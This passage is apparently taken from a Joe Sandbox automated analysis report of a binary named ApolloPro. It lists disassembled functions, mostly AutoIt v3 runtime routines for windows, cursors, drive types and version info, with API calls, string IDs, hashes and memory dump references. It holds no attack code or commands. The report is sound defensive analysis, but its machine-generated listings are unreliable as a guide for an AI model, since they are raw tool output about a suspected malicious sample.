                                                                                              • Instruction Fuzzy Hash: 71A1AF70A0020AABCB51AF21DC62EBE776BBF45B40F64402CFC05AB292EB719A55D754
                                                                                              Function 006A7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 006A7BC8
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006A7C87
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006A7CC5
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006A7CD7
                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006A7D1D
                                                                                              • GetClientRect.USER32(00000000,?), ref: 006A7D29
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006A7D6D
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006A7D7C
                                                                                              • GetStockObject.GDI32(00000011), ref: 006A7D8C
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006A7D90
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006A7DA0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006A7DA9
                                                                                              • DeleteDC.GDI32(00000000), ref: 006A7DB2
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006A7DDE
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 006A7DF5
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006A7E30
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006A7E44
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 006A7E55
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006A7E85
                                                                                              • GetStockObject.GDI32(00000011), ref: 006A7E90
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006A7E9B
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006A7EA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: ebd2c3804bc4bbebf493873bbd04b335fc37f893190c860223b7c93754d18caf
                                                                                              • Instruction ID: 11a8b3e90503873540a112803ed8f6edcbde1d3dbff089c647f9eb3fafea873f
                                                                                              • Opcode Fuzzy Hash: ebd2c3804bc4bbebf493873bbd04b335fc37f893190c860223b7c93754d18caf
                                                                                              • Instruction Fuzzy Hash: E9A12EB1A40615BFEB14DBA4DC4AFBABBBAEB45710F044154FA15A72E0D770AD00CFA4
                                                                                              Function 0069B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0069B361
                                                                                              • GetDriveTypeW.KERNEL32(?,006C2C4C,?,\\.\,006C0980), ref: 0069B43E
                                                                                              • SetErrorMode.KERNEL32(00000000,006C2C4C,?,\\.\,006C0980), ref: 0069B59C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
                                                                                              • Instruction ID: 3275164797a3af913ccc058af86febee90fd3bbd658e04c6294234fc2030bb64
                                                                                              • Opcode Fuzzy Hash: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
                                                                                              • Instruction Fuzzy Hash: 8C51BC30B41309DBCF00DF21DBC19BD77EBAB44B40B26A019E406A7A91D775AE82DB55
                                                                                              Function 006BA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 006BA0F7
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006BA1B0
                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 006BA1CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: 0
                                                                                              • API String ID: 2326795674-4108050209
                                                                                              • Opcode ID: 623a5968eb4c442e619635c106d6c0b77774254f203cc29f3ff3ffbc4c45b87e
                                                                                              • Instruction ID: bcc9b5d27db737063fce9e619b1e0f4922441ea19951cbebbdc0380e594d831e
                                                                                              • Opcode Fuzzy Hash: 623a5968eb4c442e619635c106d6c0b77774254f203cc29f3ff3ffbc4c45b87e
                                                                                              • Instruction Fuzzy Hash: 5602DCB1108301AFE7258F58C848BEABBE6FF85304F04851DF995963A1C775D985CB92
                                                                                              Function 006BAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 006BAF51
                                                                                              • SetTextColor.GDI32(?,?), ref: 006BAF55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006BAF6B
                                                                                              • GetSysColor.USER32(0000000F), ref: 006BAF76
                                                                                              • CreateSolidBrush.GDI32(?), ref: 006BAF7B
                                                                                              • GetSysColor.USER32(00000011), ref: 006BAF93
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006BAFA1
                                                                                              • SelectObject.GDI32(?,00000000), ref: 006BAFB2
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 006BAFBB
                                                                                              • SelectObject.GDI32(?,?), ref: 006BAFC8
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 006BAFE7
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006BAFFE
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 006BB013
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006BB05F
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006BB086
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 006BB0A4
                                                                                              • DrawFocusRect.USER32(?,?), ref: 006BB0AF
                                                                                              • GetSysColor.USER32(00000011), ref: 006BB0BD
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 006BB0C5
                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006BB0D9
                                                                                              • SelectObject.GDI32(?,006BAC1F), ref: 006BB0F0
                                                                                              • DeleteObject.GDI32(?), ref: 006BB0FB
                                                                                              • SelectObject.GDI32(?,?), ref: 006BB101
                                                                                              • DeleteObject.GDI32(?), ref: 006BB106
                                                                                              • SetTextColor.GDI32(?,?), ref: 006BB10C
                                                                                              • SetBkColor.GDI32(?,?), ref: 006BB116
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: 60ad0bc78c74589e8e8e14ef67c509d3ea3fa29f29894abfcb91e81be18f78e8
                                                                                              • Instruction ID: 57c66d64feb24e395c8327546161b858c30085556cfa0d747da63af20fee2905
                                                                                              • Opcode Fuzzy Hash: 60ad0bc78c74589e8e8e14ef67c509d3ea3fa29f29894abfcb91e81be18f78e8
                                                                                              • Instruction Fuzzy Hash: 3D614BB1900218EFEB119FA4DD48EFEBB7AEF08320F155115F915AB2A1D7759940CF90
                                                                                              Function 006B8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006B90EA
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006B90FB
                                                                                              • CharNextW.USER32(0000014E), ref: 006B912A
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006B916B
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006B9181
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006B9192
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006B91AF
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 006B91FB
                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006B9211
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B9242
                                                                                              • _memset.LIBCMT ref: 006B9267
                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006B92B0
                                                                                              • _memset.LIBCMT ref: 006B930F
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006B9339
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 006B9391
                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 006B943E
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 006B9460
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B94AA
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B94D7
                                                                                              • DrawMenuBar.USER32(?), ref: 006B94E6
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 006B950E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                              • String ID: 0
                                                                                              • API String ID: 1073566785-4108050209
                                                                                              • Opcode ID: f66d938d6cf3b4c45bebdb2675d83750b8d2a17814c33ddcdbdb2771da02b175
                                                                                              • Instruction ID: 66985895a2c823d4a608108bb0515d34ebc5e853f31101ab0d9aa0ed1c3eb9d8
                                                                                              • Opcode Fuzzy Hash: f66d938d6cf3b4c45bebdb2675d83750b8d2a17814c33ddcdbdb2771da02b175
                                                                                              • Instruction Fuzzy Hash: 69E194B1900219AFDF219F65CC84EFE7BBAEF05710F10815AFA15AA291D7708AC5DF60
                                                                                              Function 006B4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 006B5007
                                                                                              • GetDesktopWindow.USER32 ref: 006B501C
                                                                                              • GetWindowRect.USER32(00000000), ref: 006B5023
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006B5085
                                                                                              • DestroyWindow.USER32(?), ref: 006B50B1
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006B50DA
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006B50F8
                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006B511E
                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 006B5133
                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006B5146
                                                                                              • IsWindowVisible.USER32(?), ref: 006B5166
                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006B5181
                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006B5195
                                                                                              • GetWindowRect.USER32(?,?), ref: 006B51AD
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 006B51D3
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 006B51ED
                                                                                              • CopyRect.USER32(?,?), ref: 006B5204
                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 006B526F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: 302127302245bd3b01d2a6cedfdb96c3fbbd6641bc15f7610c2cf5f27ec83401
                                                                                              • Instruction ID: 1aab654bf4eb10ec3636c2647c0731e40aeb4ab480d9cda888870eb79c006835
                                                                                              • Opcode Fuzzy Hash: 302127302245bd3b01d2a6cedfdb96c3fbbd6641bc15f7610c2cf5f27ec83401
                                                                                              • Instruction Fuzzy Hash: E7B1AEB0604740AFD744DF64C844BAABBE6FF88314F008A1DF59A9B291DB71EC45CB96
                                                                                              Function 0069498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0069499C
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006949C2
                                                                                              • _wcscpy.LIBCMT ref: 006949F0
                                                                                              • _wcscmp.LIBCMT ref: 006949FB
                                                                                              • _wcscat.LIBCMT ref: 00694A11
                                                                                              • _wcsstr.LIBCMT ref: 00694A1C
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00694A38
                                                                                              • _wcscat.LIBCMT ref: 00694A81
                                                                                              • _wcscat.LIBCMT ref: 00694A88
                                                                                              • _wcsncpy.LIBCMT ref: 00694AB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 699586101-1459072770
                                                                                              • Opcode ID: 19df376b516524df28e5bb1105c5f9ec035f88f5e07bf8fc68ca16de77f4629a
                                                                                              • Instruction ID: 088693e61805d47a3f4ec910ec753991fccf186651240847819ed485145281f6
                                                                                              • Opcode Fuzzy Hash: 19df376b516524df28e5bb1105c5f9ec035f88f5e07bf8fc68ca16de77f4629a
                                                                                              • Instruction Fuzzy Hash: 87414572A40315BAEB55B7349C43EBF776EDF42761F00005DFD04A6282EF34DA0686A9
                                                                                              Function 00632BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00632C8C
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00632C94
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00632CBF
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00632CC7
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00632CEC
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00632D09
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00632D19
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00632D4C
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00632D60
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00632D7E
                                                                                              • GetStockObject.GDI32(00000011), ref: 00632D9A
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00632DA5
                                                                                                • Part of subcall function 00632714: GetCursorPos.USER32(?), ref: 00632727
                                                                                                • Part of subcall function 00632714: ScreenToClient.USER32(006F77B0,?), ref: 00632744
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000001), ref: 00632769
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,006313C7), ref: 00632DCC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI$hl
                                                                                              • API String ID: 1458621304-441625812
                                                                                              • Opcode ID: 594052b9b095f1b2912d41fed98230667196fad79737c2ed2c03ccd56b1ffa80
                                                                                              • Instruction ID: 205186846876034aae03b9031b8c366817ec024ab5555e35099d476cecfbe516
                                                                                              • Opcode Fuzzy Hash: 594052b9b095f1b2912d41fed98230667196fad79737c2ed2c03ccd56b1ffa80
                                                                                              • Instruction Fuzzy Hash: 5BB14B71A0020AEFDB14DFA8DD59BFE7BA6FB08310F105129FA15A7290DB74A851CB94
                                                                                              Function 00650429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • GetForegroundWindow.USER32(006C0980,?,?,?,?,?), ref: 006504E3
                                                                                              • IsWindow.USER32(?), ref: 006866BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Foreground_memmove
                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                              • API String ID: 3828923867-1919597938
                                                                                              • Opcode ID: 8735f8dfcf5d7ee9efe73b70b4ba9b1c934e1bee35bb3ac41d53b3f34ab6131e
                                                                                              • Instruction ID: b476c7d1d4205d10135c78b704c2bb2ac4a003e7d2d7567a3f281baf766b8573
                                                                                              • Opcode Fuzzy Hash: 8735f8dfcf5d7ee9efe73b70b4ba9b1c934e1bee35bb3ac41d53b3f34ab6131e
                                                                                              • Instruction Fuzzy Hash: A0D1D230104242DBDB44FF60C9919AABBB7BF55348F104B1DF856472A2DB30F99ACB96
                                                                                              Function 006B441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006B44AC
                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006B456C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                              • API String ID: 3974292440-719923060
                                                                                              • Opcode ID: 553e63cecf1a562040b6e41cb32934ed0cb212858beae6a8196ead56c2ba8732
                                                                                              • Instruction ID: e4928d6185fb5c44a1903b10d8bb1b7512e5a9d43eb5191be7b0ee003ecac31d
                                                                                              • Opcode Fuzzy Hash: 553e63cecf1a562040b6e41cb32934ed0cb212858beae6a8196ead56c2ba8732
                                                                                              • Instruction Fuzzy Hash: CEA17D702143419BCB54EF24C951AAAB7A7EF85314F10496CF8A69B3D2DF30EC4ACB95
                                                                                              Function 006A56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 006A56E1
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 006A56EC
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006A56F7
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 006A5702
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 006A570D
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 006A5718
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 006A5723
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 006A572E
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 006A5739
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 006A5744
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 006A574F
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 006A575A
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 006A5765
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 006A5770
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 006A577B
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 006A5786
                                                                                              • GetCursorInfo.USER32(?), ref: 006A5796
                                                                                              • GetLastError.KERNEL32(00000001,00000000), ref: 006A57C1
                                                                                              Memory Dump Source
